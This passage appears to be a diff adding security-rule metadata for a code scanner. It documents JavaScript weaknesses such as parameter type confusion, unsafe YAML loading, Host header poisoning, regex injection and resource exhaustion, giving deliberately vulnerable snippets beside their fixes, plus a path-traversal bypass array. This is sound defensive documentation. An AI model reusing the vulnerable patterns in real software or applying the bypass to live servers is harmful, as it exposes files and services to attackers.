Furthermore, the content of the array has been crafted to bypass sanitizers by exploiting that some identically named methods of strings and arrays behave differently.\n\n\n## Recommendation\nCheck the runtime type of sanitizer inputs if the input type is user-controlled.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using prepared statements for SQL queries.\n\n\n## Example\nFor example, Node.js server frameworks usually present request parameters as strings. But if an attacker sends multiple request parameters with the same name, then the request parameter is represented as an array instead.\n\nIn the following example, a sanitizer checks that a path does not contain the `\"..\"` string, which would allow an attacker to access content outside a user-accessible directory.\n\n\n```javascript\nvar app = require(\"express\")(),\n path = require(\"path\");\n\napp.get(\"/user-files\", function(req, res) {\n var file = req.param(\"file\");\n if (file.indexOf(\"..\") !== -1) {\n // BAD\n // we forbid relative paths that contain ..\n // as these could leave the public directory\n res.status(400).send(\"Bad request\");\n } else {\n var absolute = path.resolve(\"/public/\" + file);\n console.log(\"Sending file: %s\", absolute);\n res.sendFile(absolute);\n }\n});\n\n```\nAs written, this sanitizer is ineffective: an array like `[\"../\", \"/../secret.txt\"]` will bypass the sanitizer. The array does not contain `\"..\"` as an element, so the call to `indexOf` returns `-1` . This is problematic since the value of the `absolute` variable then ends up being `\"/secret.txt\"`. 
This happens since the concatenation of `\"/public/\"` and the array results in `\"/public/../,/../secret.txt\"`, which the `resolve`-call converts to `\"/secret.txt\"`.\n\nTo fix the sanitizer, check that the request parameter is a string, and not an array:\n\n\n```javascript\nvar app = require(\"express\")(),\n path = require(\"path\");\n\napp.get(\"/user-files\", function(req, res) {\n var file = req.param(\"file\");\n if (typeof file !== 'string' || file.indexOf(\"..\") !== -1) {\n // GOOD\n // we forbid relative paths that contain ..\n // as these could leave the public directory\n res.status(400).send(\"Bad request\");\n } else {\n var absolute = path.resolve(\"/public/\" + file);\n console.log(\"Sending file: %s\", absolute);\n res.sendFile(absolute);\n }\n});\n\n```\n\n## References\n* Node.js API: [querystring](https://nodejs.org/api/querystring.html).\n* Common Weakness Enumeration: [CWE-843](https://cwe.mitre.org/data/definitions/843.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-843" ], + "description" : "Sanitizing an HTTP request parameter may be ineffective if the user controls its type.", + "id" : "js/type-confusion-through-parameter-tampering", + "kind" : "path-problem", + "name" : "Type confusion through parameter tampering", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "9.8" + } + }, { + "id" : "js/unsafe-deserialization", + "name" : "js/unsafe-deserialization", + "shortDescription" : { + "text" : "Deserialization of user-controlled data" + }, + "fullDescription" : { + "text" : "Deserializing user-controlled data may allow attackers to execute arbitrary code." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Deserialization of user-controlled data\nDeserializing untrusted data using any deserialization framework that allows the construction of arbitrary functions is easily exploitable and, in many cases, allows an attacker to execute arbitrary code.\n\n\n## Recommendation\nAvoid deserialization of untrusted data if at all possible. If the architecture permits it, then use formats like JSON or XML that cannot represent functions. When using YAML or other formats that support the serialization and deserialization of functions, ensure that the parser is configured to disable deserialization of arbitrary functions.\n\n\n## Example\nThe following example calls the `load` function of the popular `js-yaml` package on data that comes from an HTTP request and hence is inherently unsafe.\n\n\n```javascript\nconst app = require(\"express\")(),\n jsyaml = require(\"js-yaml\");\n\napp.get(\"load\", function(req, res) {\n let data = jsyaml.load(req.params.data);\n // ...\n});\n\n```\nUsing the `safeLoad` function instead (which does not deserialize YAML-encoded functions) removes the vulnerability.\n\n\n```javascript\nconst app = require(\"express\")(),\n jsyaml = require(\"js-yaml\");\n\napp.get(\"load\", function(req, res) {\n let data = jsyaml.safeLoad(req.params.data);\n // ...\n});\n\n```\n\n## References\n* OWASP vulnerability description: [Deserialization of untrusted data](https://www.owasp.org/index.php/Deserialization_of_untrusted_data).\n* OWASP guidance on deserializing objects: [Deserialization Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html).\n* Neal Poole: [Code Execution via YAML in JS-YAML Node.js Module](https://nealpoole.com/blog/2013/06/code-execution-via-yaml-in-js-yaml-nodejs-module/).\n* Common Weakness Enumeration: [CWE-502](https://cwe.mitre.org/data/definitions/502.html).\n", + "markdown" : "# 
Deserialization of user-controlled data\nDeserializing untrusted data using any deserialization framework that allows the construction of arbitrary functions is easily exploitable and, in many cases, allows an attacker to execute arbitrary code.\n\n\n## Recommendation\nAvoid deserialization of untrusted data if at all possible. If the architecture permits it, then use formats like JSON or XML that cannot represent functions. When using YAML or other formats that support the serialization and deserialization of functions, ensure that the parser is configured to disable deserialization of arbitrary functions.\n\n\n## Example\nThe following example calls the `load` function of the popular `js-yaml` package on data that comes from an HTTP request and hence is inherently unsafe.\n\n\n```javascript\nconst app = require(\"express\")(),\n jsyaml = require(\"js-yaml\");\n\napp.get(\"load\", function(req, res) {\n let data = jsyaml.load(req.params.data);\n // ...\n});\n\n```\nUsing the `safeLoad` function instead (which does not deserialize YAML-encoded functions) removes the vulnerability.\n\n\n```javascript\nconst app = require(\"express\")(),\n jsyaml = require(\"js-yaml\");\n\napp.get(\"load\", function(req, res) {\n let data = jsyaml.safeLoad(req.params.data);\n // ...\n});\n\n```\n\n## References\n* OWASP vulnerability description: [Deserialization of untrusted data](https://www.owasp.org/index.php/Deserialization_of_untrusted_data).\n* OWASP guidance on deserializing objects: [Deserialization Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html).\n* Neal Poole: [Code Execution via YAML in JS-YAML Node.js Module](https://nealpoole.com/blog/2013/06/code-execution-via-yaml-in-js-yaml-nodejs-module/).\n* Common Weakness Enumeration: [CWE-502](https://cwe.mitre.org/data/definitions/502.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-502" ], + "description" : "Deserializing user-controlled data may allow 
attackers to\n execute arbitrary code.", + "id" : "js/unsafe-deserialization", + "kind" : "path-problem", + "name" : "Deserialization of user-controlled data", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "9.8" + } + }, { + "id" : "js/host-header-forgery-in-email-generation", + "name" : "js/host-header-forgery-in-email-generation", + "shortDescription" : { + "text" : "Host header poisoning in email generation" + }, + "fullDescription" : { + "text" : "Using the HTTP Host header to construct a link in an email can facilitate phishing attacks and leak password reset tokens." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Host header poisoning in email generation\nUsing the HTTP Host header to construct a link in an email can facilitate phishing attacks and leak password reset tokens. A malicious user can send an HTTP request to the targeted web site, but with a Host header that refers to his own web site. This means the emails will be sent out to potential victims, originating from a server they trust, but with links leading to a malicious web site.\n\nIf the email contains a password reset link, and should the victim click the link, the secret reset token will be leaked to the attacker. Using the leaked token, the attacker can then construct the real reset link and use it to change the victim's password.\n\n\n## Recommendation\nObtain the server's host name from a configuration file and avoid relying on the Host header.\n\n\n## Example\nThe following example uses the `req.host` to generate a password reset link. 
This value is derived from the Host header, and can thus be set to anything by an attacker:\n\n\n```javascript\nlet nodemailer = require('nodemailer');\nlet express = require('express');\nlet backend = require('./backend');\n\nlet app = express();\n\nlet config = JSON.parse(fs.readFileSync('config.json', 'utf8'));\n\napp.post('/resetpass', (req, res) => {\n let email = req.query.email;\n let transport = nodemailer.createTransport(config.smtp);\n let token = backend.getUserSecretResetToken(email);\n transport.sendMail({\n from: 'webmaster@example.com',\n to: email,\n subject: 'Forgot password',\n text: `Click to reset password: https://${req.host}/resettoken/${token}`,\n });\n});\n\n```\nTo ensure the link refers to the correct web site, get the host name from a configuration file:\n\n\n```javascript\nlet nodemailer = require('nodemailer');\nlet express = require('express');\nlet backend = require('./backend');\n\nlet app = express();\n\nlet config = JSON.parse(fs.readFileSync('config.json', 'utf8'));\n\napp.post('/resetpass', (req, res) => {\n let email = req.query.email;\n let transport = nodemailer.createTransport(config.smtp);\n let token = backend.getUserSecretResetToken(email);\n transport.sendMail({\n from: 'webmaster@example.com',\n to: email,\n subject: 'Forgot password',\n text: `Click to reset password: https://${config.hostname}/resettoken/${token}`,\n });\n});\n\n```\n\n## References\n* Mitre: [CWE-640: Weak Password Recovery Mechanism for Forgotten Password](https://cwe.mitre.org/data/definitions/640.html).\n* Ian Muscat: [What is a Host Header Attack?](https://www.acunetix.com/blog/articles/automated-detection-of-host-header-attacks/).\n* Common Weakness Enumeration: [CWE-640](https://cwe.mitre.org/data/definitions/640.html).\n", + "markdown" : "# Host header poisoning in email generation\nUsing the HTTP Host header to construct a link in an email can facilitate phishing attacks and leak password reset tokens. 
A malicious user can send an HTTP request to the targeted web site, but with a Host header that refers to his own web site. This means the emails will be sent out to potential victims, originating from a server they trust, but with links leading to a malicious web site.\n\nIf the email contains a password reset link, and should the victim click the link, the secret reset token will be leaked to the attacker. Using the leaked token, the attacker can then construct the real reset link and use it to change the victim's password.\n\n\n## Recommendation\nObtain the server's host name from a configuration file and avoid relying on the Host header.\n\n\n## Example\nThe following example uses the `req.host` to generate a password reset link. This value is derived from the Host header, and can thus be set to anything by an attacker:\n\n\n```javascript\nlet nodemailer = require('nodemailer');\nlet express = require('express');\nlet backend = require('./backend');\n\nlet app = express();\n\nlet config = JSON.parse(fs.readFileSync('config.json', 'utf8'));\n\napp.post('/resetpass', (req, res) => {\n let email = req.query.email;\n let transport = nodemailer.createTransport(config.smtp);\n let token = backend.getUserSecretResetToken(email);\n transport.sendMail({\n from: 'webmaster@example.com',\n to: email,\n subject: 'Forgot password',\n text: `Click to reset password: https://${req.host}/resettoken/${token}`,\n });\n});\n\n```\nTo ensure the link refers to the correct web site, get the host name from a configuration file:\n\n\n```javascript\nlet nodemailer = require('nodemailer');\nlet express = require('express');\nlet backend = require('./backend');\n\nlet app = express();\n\nlet config = JSON.parse(fs.readFileSync('config.json', 'utf8'));\n\napp.post('/resetpass', (req, res) => {\n let email = req.query.email;\n let transport = nodemailer.createTransport(config.smtp);\n let token = backend.getUserSecretResetToken(email);\n transport.sendMail({\n from: 
'webmaster@example.com',\n to: email,\n subject: 'Forgot password',\n text: `Click to reset password: https://${config.hostname}/resettoken/${token}`,\n });\n});\n\n```\n\n## References\n* Mitre: [CWE-640: Weak Password Recovery Mechanism for Forgotten Password](https://cwe.mitre.org/data/definitions/640.html).\n* Ian Muscat: [What is a Host Header Attack?](https://www.acunetix.com/blog/articles/automated-detection-of-host-header-attacks/).\n* Common Weakness Enumeration: [CWE-640](https://cwe.mitre.org/data/definitions/640.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-640" ], + "description" : "Using the HTTP Host header to construct a link in an email can facilitate phishing\n attacks and leak password reset tokens.", + "id" : "js/host-header-forgery-in-email-generation", + "kind" : "path-problem", + "name" : "Host header poisoning in email generation", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "9.8" + } + }, { + "id" : "js/regex-injection", + "name" : "js/regex-injection", + "shortDescription" : { + "text" : "Regular expression injection" + }, + "fullDescription" : { + "text" : "User input should not be used in regular expressions without first being escaped, otherwise a malicious user may be able to inject an expression that could require exponential time on certain inputs." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Regular expression injection\nConstructing a regular expression with unsanitized user input is dangerous as a malicious user may be able to modify the meaning of the expression. 
In particular, such a user may be able to provide a regular expression fragment that takes exponential time in the worst case, and use that to perform a Denial of Service attack.\n\n\n## Recommendation\nBefore embedding user input into a regular expression, use a sanitization function such as lodash's `_.escapeRegExp` to escape meta-characters that have special meaning.\n\n\n## Example\nThe following example shows a HTTP request parameter that is used to construct a regular expression without sanitizing it first:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.get('/findKey', function(req, res) {\n var key = req.param(\"key\"), input = req.param(\"input\");\n\n // BAD: Unsanitized user input is used to construct a regular expression\n var re = new RegExp(\"\\\\b\" + key + \"=(.*)\\n\");\n});\n\n```\nInstead, the request parameter should be sanitized first, for example using the function `_.escapeRegExp` from the lodash package. This ensures that the user cannot insert characters which have a special meaning in regular expressions.\n\n\n```javascript\nvar express = require('express');\nvar _ = require('lodash');\nvar app = express();\n\napp.get('/findKey', function(req, res) {\n var key = req.param(\"key\"), input = req.param(\"input\");\n\n // GOOD: User input is sanitized before constructing the regex\n var safeKey = _.escapeRegExp(key);\n var re = new RegExp(\"\\\\b\" + safeKey + \"=(.*)\\n\");\n});\n\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* npm: [lodash](https://www.npmjs.com/package/lodash).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", + "markdown" : "# Regular expression injection\nConstructing a regular 
expression with unsanitized user input is dangerous as a malicious user may be able to modify the meaning of the expression. In particular, such a user may be able to provide a regular expression fragment that takes exponential time in the worst case, and use that to perform a Denial of Service attack.\n\n\n## Recommendation\nBefore embedding user input into a regular expression, use a sanitization function such as lodash's `_.escapeRegExp` to escape meta-characters that have special meaning.\n\n\n## Example\nThe following example shows a HTTP request parameter that is used to construct a regular expression without sanitizing it first:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.get('/findKey', function(req, res) {\n var key = req.param(\"key\"), input = req.param(\"input\");\n\n // BAD: Unsanitized user input is used to construct a regular expression\n var re = new RegExp(\"\\\\b\" + key + \"=(.*)\\n\");\n});\n\n```\nInstead, the request parameter should be sanitized first, for example using the function `_.escapeRegExp` from the lodash package. 
This ensures that the user cannot insert characters which have a special meaning in regular expressions.\n\n\n```javascript\nvar express = require('express');\nvar _ = require('lodash');\nvar app = express();\n\napp.get('/findKey', function(req, res) {\n var key = req.param(\"key\"), input = req.param(\"input\");\n\n // GOOD: User input is sanitized before constructing the regex\n var safeKey = _.escapeRegExp(key);\n var re = new RegExp(\"\\\\b\" + safeKey + \"=(.*)\\n\");\n});\n\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* npm: [lodash](https://www.npmjs.com/package/lodash).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-730", "external/cwe/cwe-400" ], + "description" : "User input should not be used in regular expressions without first being escaped,\n otherwise a malicious user may be able to inject an expression that could require\n exponential time on certain inputs.", + "id" : "js/regex-injection", + "kind" : "path-problem", + "name" : "Regular expression injection", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "7.5" + } + }, { + "id" : "js/server-crash", + "name" : "js/server-crash", + "shortDescription" : { + "text" : "Server crash" + }, + "fullDescription" : { + "text" : "A server that can be forced to crash may be vulnerable to denial-of-service attacks." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Server crash\nServers handle requests from clients until terminated deliberately by a server administrator. 
A client request that results in an uncaught server-side exception causes the current server response generation to fail, and should not have an effect on subsequent client requests.\n\nUnder some circumstances, uncaught exceptions can however cause the entire server to terminate abruptly. Such a behavior is highly undesirable, especially if it gives malicious users the ability to turn off the server at will, which is an efficient denial-of-service attack.\n\n\n## Recommendation\nEnsure that the processing of client requests can not cause uncaught exceptions to terminate the entire server abruptly.\n\n\n## Example\nThe following server code checks if a client-provided file path is valid before saving data to that path. It would be reasonable to expect that the server responds with an error in case the request contains an invalid file path. However, the server instead throws an exception, which is uncaught in the context of the asynchronous callback invocation (`fs.access(...)`). This causes the entire server to terminate abruptly.\n\n\n```javascript\nconst express = require(\"express\"),\n fs = require(\"fs\");\n\nfunction save(rootDir, path, content) {\n if (!isValidPath(rootDir, req.query.filePath)) {\n throw new Error(`Invalid filePath: ${req.query.filePath}`); // BAD crashes the server\n }\n // write content to disk\n}\n\nexpress().post(\"/save\", (req, res) => {\n fs.access(rootDir, (err) => {\n if (err) {\n console.error(\n `Server setup is corrupted, ${rootDir} cannot be accessed!`\n );\n res.status(500);\n res.end();\n return;\n }\n save(rootDir, req.query.path, req.body);\n res.status(200);\n res.end();\n });\n});\n\n```\nTo remedy this, the server can catch the exception explicitly with a `try/catch` block, and generate an appropriate error response instead:\n\n\n```javascript\n// ...\nexpress().post(\"/save\", (req, res) => {\n fs.access(rootDir, (err) => {\n // ...\n try {\n save(rootDir, req.query.path, req.body); // GOOD exception is caught below\n 
res.status(200);\n res.end();\n } catch (e) {\n res.status(500);\n res.end();\n }\n });\n});\n\n```\nTo simplify exception handling, it may be advisable to switch to async/await syntax instead of using callbacks, which allows wrapping the entire request handler in a `try/catch` block:\n\n\n```javascript\n// ...\nexpress().post(\"/save\", async (req, res) => {\n try {\n await fs.promises.access(rootDir);\n save(rootDir, req.query.path, req.body); // GOOD exception is caught below\n res.status(200);\n res.end();\n } catch (e) {\n res.status(500);\n res.end();\n }\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-248](https://cwe.mitre.org/data/definitions/248.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n", + "markdown" : "# Server crash\nServers handle requests from clients until terminated deliberately by a server administrator. A client request that results in an uncaught server-side exception causes the current server response generation to fail, and should not have an effect on subsequent client requests.\n\nUnder some circumstances, uncaught exceptions can however cause the entire server to terminate abruptly. Such a behavior is highly undesirable, especially if it gives malicious users the ability to turn off the server at will, which is an efficient denial-of-service attack.\n\n\n## Recommendation\nEnsure that the processing of client requests can not cause uncaught exceptions to terminate the entire server abruptly.\n\n\n## Example\nThe following server code checks if a client-provided file path is valid before saving data to that path. It would be reasonable to expect that the server responds with an error in case the request contains an invalid file path. However, the server instead throws an exception, which is uncaught in the context of the asynchronous callback invocation (`fs.access(...)`). 
This causes the entire server to terminate abruptly.\n\n\n```javascript\nconst express = require(\"express\"),\n fs = require(\"fs\");\n\nfunction save(rootDir, path, content) {\n if (!isValidPath(rootDir, req.query.filePath)) {\n throw new Error(`Invalid filePath: ${req.query.filePath}`); // BAD crashes the server\n }\n // write content to disk\n}\n\nexpress().post(\"/save\", (req, res) => {\n fs.access(rootDir, (err) => {\n if (err) {\n console.error(\n `Server setup is corrupted, ${rootDir} cannot be accessed!`\n );\n res.status(500);\n res.end();\n return;\n }\n save(rootDir, req.query.path, req.body);\n res.status(200);\n res.end();\n });\n});\n\n```\nTo remedy this, the server can catch the exception explicitly with a `try/catch` block, and generate an appropriate error response instead:\n\n\n```javascript\n// ...\nexpress().post(\"/save\", (req, res) => {\n fs.access(rootDir, (err) => {\n // ...\n try {\n save(rootDir, req.query.path, req.body); // GOOD exception is caught below\n res.status(200);\n res.end();\n } catch (e) {\n res.status(500);\n res.end();\n }\n });\n});\n\n```\nTo simplify exception handling, it may be advisable to switch to async/await syntax instead of using callbacks, which allows wrapping the entire request handler in a `try/catch` block:\n\n\n```javascript\n// ...\nexpress().post(\"/save\", async (req, res) => {\n try {\n await fs.promises.access(rootDir);\n save(rootDir, req.query.path, req.body); // GOOD exception is caught below\n res.status(200);\n res.end();\n } catch (e) {\n res.status(500);\n res.end();\n }\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-248](https://cwe.mitre.org/data/definitions/248.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-248", "external/cwe/cwe-730" ], + "description" : "A server that can be forced to crash may be vulnerable to denial-of-service\n attacks.", + 
"id" : "js/server-crash", + "kind" : "path-problem", + "name" : "Server crash", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/missing-rate-limiting", + "name" : "js/missing-rate-limiting", + "shortDescription" : { + "text" : "Missing rate limiting" + }, + "fullDescription" : { + "text" : "An HTTP request handler that performs expensive operations without restricting the rate at which operations can be carried out is vulnerable to denial-of-service attacks." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Missing rate limiting\nHTTP request handlers should not perform expensive operations such as accessing the file system, executing an operating system command or interacting with a database without limiting the rate at which requests are accepted. Otherwise, the application becomes vulnerable to denial-of-service attacks where an attacker can cause the application to crash or become unresponsive by issuing a large number of requests at the same time.\n\n\n## Recommendation\nA rate-limiting middleware should be used to prevent such attacks.\n\n\n## Example\nThe following example shows an Express application that serves static files without rate limiting:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.get('/:path', function(req, res) {\n let path = req.params.path;\n if (isValidPath(path))\n res.sendFile(path);\n});\n\n```\nTo prevent denial-of-service attacks, the `express-rate-limit` package can be used:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\n// set up rate limiter: maximum of five requests per minute\nvar RateLimit = require('express-rate-limit');\nvar limiter = RateLimit({\n windowMs: 15 * 60 * 1000, // 15 minutes\n max: 100, // max 100 requests per windowMs\n});\n\n// apply rate limiter to all requests\napp.use(limiter);\n\napp.get('/:path', function(req, res) {\n 
let path = req.params.path;\n if (isValidPath(path))\n res.sendFile(path);\n});\n\n```\n\n## References\n* OWASP: [Denial of Service Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Denial_of_Service_Cheat_Sheet.html).\n* Wikipedia: [Denial-of-service attack](https://en.wikipedia.org/wiki/Denial-of-service_attack).\n* NPM: [express-rate-limit](https://www.npmjs.com/package/express-rate-limit).\n* Common Weakness Enumeration: [CWE-770](https://cwe.mitre.org/data/definitions/770.html).\n* Common Weakness Enumeration: [CWE-307](https://cwe.mitre.org/data/definitions/307.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", + "markdown" : "# Missing rate limiting\nHTTP request handlers should not perform expensive operations such as accessing the file system, executing an operating system command or interacting with a database without limiting the rate at which requests are accepted. Otherwise, the application becomes vulnerable to denial-of-service attacks where an attacker can cause the application to crash or become unresponsive by issuing a large number of requests at the same time.\n\n\n## Recommendation\nA rate-limiting middleware should be used to prevent such attacks.\n\n\n## Example\nThe following example shows an Express application that serves static files without rate limiting:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.get('/:path', function(req, res) {\n let path = req.params.path;\n if (isValidPath(path))\n res.sendFile(path);\n});\n\n```\nTo prevent denial-of-service attacks, the `express-rate-limit` package can be used:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\n// set up rate limiter: maximum of five requests per minute\nvar RateLimit = require('express-rate-limit');\nvar limiter = RateLimit({\n windowMs: 15 * 60 * 1000, // 15 minutes\n max: 100, // max 100 requests per windowMs\n});\n\n// apply rate limiter to all 
requests\napp.use(limiter);\n\napp.get('/:path', function(req, res) {\n let path = req.params.path;\n if (isValidPath(path))\n res.sendFile(path);\n});\n\n```\n\n## References\n* OWASP: [Denial of Service Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Denial_of_Service_Cheat_Sheet.html).\n* Wikipedia: [Denial-of-service attack](https://en.wikipedia.org/wiki/Denial-of-service_attack).\n* NPM: [express-rate-limit](https://www.npmjs.com/package/express-rate-limit).\n* Common Weakness Enumeration: [CWE-770](https://cwe.mitre.org/data/definitions/770.html).\n* Common Weakness Enumeration: [CWE-307](https://cwe.mitre.org/data/definitions/307.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-770", "external/cwe/cwe-307", "external/cwe/cwe-400" ], + "description" : "An HTTP request handler that performs expensive operations without\n restricting the rate at which operations can be carried out is vulnerable\n to denial-of-service attacks.", + "id" : "js/missing-rate-limiting", + "kind" : "problem", + "name" : "Missing rate limiting", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/resource-exhaustion", + "name" : "js/resource-exhaustion", + "shortDescription" : { + "text" : "Resource exhaustion" + }, + "fullDescription" : { + "text" : "Allocating objects or timers with user-controlled sizes or durations can cause resource exhaustion." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Resource exhaustion\nApplications are constrained by how many resources they can make use of. Failing to respect these constraints may cause the application to be unresponsive or crash. 
It is therefore problematic if attackers can control the sizes or lifetimes of allocated objects.\n\n\n## Recommendation\nEnsure that attackers can not control object sizes and their lifetimes. If object sizes and lifetimes must be controlled by external parties, ensure you restrict the object sizes and lifetimes so that they are within acceptable ranges.\n\n\n## Example\nThe following example allocates a buffer with a user-controlled size.\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tlet buffer = Buffer.alloc(size); // BAD\n\n\t// ... use the buffer\n});\n```\nThis is problematic since an attacker can choose a size that makes the application run out of memory. Even worse, in older versions of Node.js, this could leak confidential memory. To prevent such attacks, limit the buffer size:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tif (size > 1024) {\n\t\tres.statusCode = 400;\n\t\tres.end(\"Bad request.\");\n\t\treturn;\n\t}\n\n\tlet buffer = Buffer.alloc(size); // GOOD\n\n\t// ... use the buffer\n});\n```\n\n## Example\nAs another example, consider an application that allocates an array with a user-controlled size, and then fills it with values:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tlet dogs = new Array(size).fill(\"dog\"); // BAD\n\n\t// ... use the dog\n});\n```\nThe allocation of the array itself is not problematic since arrays are allocated sparsely, but the subsequent filling of the array will take a long time, causing the application to be unresponsive, or even run out of memory. 
Again, a limit on the size will prevent the attack:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tif (size > 1024) {\n\t\tres.statusCode = 400;\n\t\tres.end(\"Bad request.\");\n\t\treturn;\n\t}\n\n\tlet dogs = new Array(size).fill(\"dog\"); // GOOD\n\n\t// ... use the dogs\n});\n```\n\n## Example\nFinally, the following example lets a user choose a delay after which a function is executed:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar delay = parseInt(url.parse(req.url, true).query.delay);\n\n\tsetTimeout(f, delay); // BAD\n\n});\n\n```\nThis is problematic because a large delay essentially makes the application wait indefinitely before executing the function. Repeated registrations of such delays will therefore use up all of the memory in the application. A limit on the delay will prevent the attack:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar delay = parseInt(url.parse(req.url, true).query.delay);\n\n\tif (delay > 1000) {\n\t\tres.statusCode = 400;\n\t\tres.end(\"Bad request.\");\n\t\treturn;\n\t}\n\n\tsetTimeout(f, delay); // GOOD\n\n});\n\n```\n\n## References\n* Wikipedia: [Denial-of-service attack](https://en.wikipedia.org/wiki/Denial-of-service_attack).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-770](https://cwe.mitre.org/data/definitions/770.html).\n", + "markdown" : "# Resource exhaustion\nApplications are constrained by how many resources they can make use of. Failing to respect these constraints may cause the application to be unresponsive or crash. 
It is therefore problematic if attackers can control the sizes or lifetimes of allocated objects.\n\n\n## Recommendation\nEnsure that attackers can not control object sizes and their lifetimes. If object sizes and lifetimes must be controlled by external parties, ensure you restrict the object sizes and lifetimes so that they are within acceptable ranges.\n\n\n## Example\nThe following example allocates a buffer with a user-controlled size.\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tlet buffer = Buffer.alloc(size); // BAD\n\n\t// ... use the buffer\n});\n```\nThis is problematic since an attacker can choose a size that makes the application run out of memory. Even worse, in older versions of Node.js, this could leak confidential memory. To prevent such attacks, limit the buffer size:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tif (size > 1024) {\n\t\tres.statusCode = 400;\n\t\tres.end(\"Bad request.\");\n\t\treturn;\n\t}\n\n\tlet buffer = Buffer.alloc(size); // GOOD\n\n\t// ... use the buffer\n});\n```\n\n## Example\nAs another example, consider an application that allocates an array with a user-controlled size, and then fills it with values:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tlet dogs = new Array(size).fill(\"dog\"); // BAD\n\n\t// ... use the dog\n});\n```\nThe allocation of the array itself is not problematic since arrays are allocated sparsely, but the subsequent filling of the array will take a long time, causing the application to be unresponsive, or even run out of memory. 
